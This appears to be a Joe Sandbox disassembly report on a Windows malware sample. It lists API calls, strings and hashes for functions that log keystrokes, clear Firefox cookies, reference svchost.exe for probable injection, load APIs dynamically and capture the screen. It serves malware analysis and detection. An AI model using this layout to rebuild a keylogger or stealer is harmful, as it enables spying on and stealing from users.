                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004106C8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 004106E1
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00419298), ref: 004106F7
                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410184,?), ref: 00410727
                                                • GetLastError.KERNEL32 ref: 00410731
                                                • malloc.MSVCRT ref: 00410747
                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410184,?), ref: 00410766
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 0041078A
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00410798
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004107A4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107B9
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 004107CA
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004107D7
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004107E3
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107EC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004107F8
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00414B94,?), ref: 00410809
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                                • String ID:
                                                • API String ID: 2829549728-0
                                                • Opcode ID: 2fa0e530b149dcad9d110a188135399984b8e95bcd493c4d583faa46f0272b87
                                                • Instruction ID: e18bbbac05a6e350111e28d5ab5c859b0810997aa56c281f851eeba24b99bb46
                                                • Opcode Fuzzy Hash: 2fa0e530b149dcad9d110a188135399984b8e95bcd493c4d583faa46f0272b87
                                                • Instruction Fuzzy Hash: 06A1BC71800119AFCF15EF90EC59EEEBB78FB18305F1081A9F516A2164EB745B89CF58
                                                Function 00406920 Relevance: 64.9, APIs: 31, Strings: 6, Instructions: 193fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,75920F00,00000000), ref: 00406932
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040693F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,?), ref: 00406951
                                                • getenv.MSVCRT ref: 0040695D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00406969
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00406975
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040697E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406987
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00413A34,?), ref: 004069A1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004069AB
                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004069B2
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004069BE
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004069CC
                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004069F1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 00406A92
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00406A9F
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AAB
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AB4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406ABD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AC6
                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406ACD
                                                • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AD7
                                                • FindNextFileA.KERNEL32(000000FF,00000010,?,?,?), ref: 00406AEB
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406AF9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],?,?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B10
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B25
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00406B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$Find$??0?$basic_string@D@1@@D@2@@0@FileHstd@@V01@V01@@V?$basic_string@$V10@$??4?$basic_string@?c_str@?$basic_string@CloseNextY?$basic_string@$DeleteErrorEventFirstLastV10@@getenv
                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\=A$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                • API String ID: 830200565-3920034925
                                                • Opcode ID: 776b2be4da0d4257667772fd5be241781957cc5658d04cd6243fbc1dd53b00f1
                                                • Instruction ID: 783fcf7c0b86e27e6131c177fc7404f8b43a340b055d1e10257517d2a055a55a
                                                • Opcode Fuzzy Hash: 776b2be4da0d4257667772fd5be241781957cc5658d04cd6243fbc1dd53b00f1
                                                • Instruction Fuzzy Hash: 9E615371900109ABCF00BFA0DC599EE7B78EF16306F0481B6E553F3190EA399A99CB58
                                                Function 00403F4D Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403F62
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40), ref: 00403F72
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F7C
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F86
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403FA9
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403FB3
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403FBA
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403FC6
                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403FE0
                                                • wcscmp.MSVCRT ref: 0040400D
                                                • wcscmp.MSVCRT ref: 00404025
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 0040403D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 0040404F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 0040405C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040406A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404073
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404082
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404091
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004040A1
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404198
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041A1
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041AA
                                                  • Part of subcall function 00403F4D: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004041B3
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 004040B5
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40,?,?,?), ref: 004040BF
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 004040C9
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 004040D3
                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 004040EB
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404112
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040411C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404125
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00419288,?), ref: 0040414F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404159
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404174
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040417D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040418A
                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004041C0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041C9
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041D2
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004041DB
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                                • String ID:
                                                • API String ID: 1504175218-0
                                                • Opcode ID: 1ba8b113bf0700534af131f4cc335293d798d7936cc6f93eaf08f4156770f41e
                                                • Instruction ID: 444a803302a1e0bee7a230f5f554ee64eaaf2269fd5fb643ddbdb103b48501e0
                                                • Opcode Fuzzy Hash: 1ba8b113bf0700534af131f4cc335293d798d7936cc6f93eaf08f4156770f41e
                                                • Instruction Fuzzy Hash: 8071BE7290010AAFCF04EFA0EC59DEE7B7CAF14316F14816AF516A21A0EF749759CB58
                                                Function 00409B4E Relevance: 59.7, APIs: 29, Strings: 5, Instructions: 155COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcessId.KERNEL32 ref: 00409B56
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,00000000), ref: 00409B69
                                                  • Part of subcall function 0040AB86: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AB93
                                                  • Part of subcall function 0040AB86: RegSetValueExA.ADVAPI32(00000004,00000000,00000000,00000004,?,00000004,00000000,?,0040935F,80000001,00000000), ref: 0040ABAE
                                                  • Part of subcall function 0040AB86: RegCloseKey.ADVAPI32(?,?,0040935F,80000001,00000000), ref: 0040ABB9
                                                • OpenMutexA.KERNEL32(00100000,00000000), ref: 00409B97
                                                • CloseHandle.KERNEL32(00000000), ref: 00409BA3
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 00409BB5
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00409BD3
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 00409BE1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ?c_str@?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CloseOpenProcess$CreateCurrentHandleMutexValue
                                                • String ID: WDH$WinDir$\SysWOW64$\svchost.exe$\system32
                                                • API String ID: 1328014081-723382136
                                                • Opcode ID: 355c978dcdeee43627a75c0862c9d341e1a52c63927369a35f245de303cddc4e
                                                • Instruction ID: 8e48412dd88898db2cba31deebed8709c06bc6343ba3e07b923980143f207dbd
                                                • Opcode Fuzzy Hash: 355c978dcdeee43627a75c0862c9d341e1a52c63927369a35f245de303cddc4e
                                                • Instruction Fuzzy Hash: 7D512172940109BFDB05AF90EC59EEE7B78EF18306F044076F502A21A1DF795A4ACB6D
                                                Function 004051EA Relevance: 56.9, APIs: 3, Strings: 29, Instructions: 882COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,75A8C0D0,?), ref: 004054A2
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413994,?), ref: 00405A2C
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413974,?,?,?,?,00000001), ref: 00405B7E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up] $4:A$?F@
                                                • API String ID: 4257247948-2284782974
                                                • Opcode ID: df4268028e8cfb44b5a47f789470c90612686643210732c79c93e9ce552e92e9
                                                • Instruction ID: 3f19922d5db0b4e0d37d61c04f39453babe7b1b0fadf195898c3e5135ea59910
                                                • Opcode Fuzzy Hash: df4268028e8cfb44b5a47f789470c90612686643210732c79c93e9ce552e92e9
                                                • Instruction Fuzzy Hash: C53293B2704809BFDB04B9EC8997DFF7A3DD640351B5009ABE803B61C1E9785E445EAB
                                                Function 00409008 Relevance: 52.6, APIs: 18, Strings: 12, Instructions: 69libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00419970,00419BC8,00000000,004086EB,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040901B
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409024
                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 0040903F
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409042
                                                • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409053
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409056
                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409070
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409073
                                                • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409084
                                                • GetProcAddress.KERNEL32(00000000), ref: 00409087
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00409099
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040909C
                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090A9
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090AC
                                                • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090BD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090C0
                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004090CD
                                                • GetProcAddress.KERNEL32(00000000), ref: 004090D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule$LibraryLoad
                                                • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                                                • API String ID: 551388010-3266460993
                                                • Opcode ID: 21593a0b256e8a2cfc5ade98b8b954114bbfc078fb699abbcbb9f07ba6c57c36
                                                • Instruction ID: e2e5716fddf3a60e450527925cfbd32ed5e5a225cb0b5d279c510540278e33a3
                                                • Opcode Fuzzy Hash: 21593a0b256e8a2cfc5ade98b8b954114bbfc078fb699abbcbb9f07ba6c57c36
                                                • Instruction Fuzzy Hash: B7111CF0E443547ACA106FB6BC59ECB6E9DFAC9B597214437F104E3190DABC99808E6C
                                                Function 0040FC69 Relevance: 50.9, APIs: 28, Strings: 1, Instructions: 176sleeptimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040FC6E
                                                • GdiplusStartup.GDIPLUS(00419E14,?,00000000,00000000,00000000,00000000), ref: 0040FCA7
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 0040FCCB
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040FCDD
                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040FCFD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FD09
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040FD15
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040FD1E
                                                • CreateDirectoryW.KERNEL32(00000000), ref: 0040FD25
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040FD38
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040FD4B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00413864), ref: 0040FDAA
                                                • Sleep.KERNEL32(000003E8), ref: 0040FDC7
                                                • GetLocalTime.KERNEL32(?), ref: 0040FDD2
                                                • swprintf.MSVCRT(?,XKA,?,?,?,?,?,?), ref: 0040FE15
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00419E68,00413888,?,00413864), ref: 0040FE3B
